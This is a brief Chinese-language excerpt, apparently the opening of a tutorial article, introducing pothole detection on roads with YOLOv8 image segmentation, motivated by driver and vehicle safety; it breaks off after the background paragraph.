导 读 本文主要介绍使用YOLOv8图像分割实现路面坑洞检测&#xff08;步骤 代码&#xff09;。 背 景 如上图所示&#xff0c;现实生活中路面坑洞对车辆和驾驶员安全来说存在巨大隐患&#xff0c;本文将介绍如何使用YoloV8图像分割技术来检测路面坑洞&#xff0c;从而提示驾…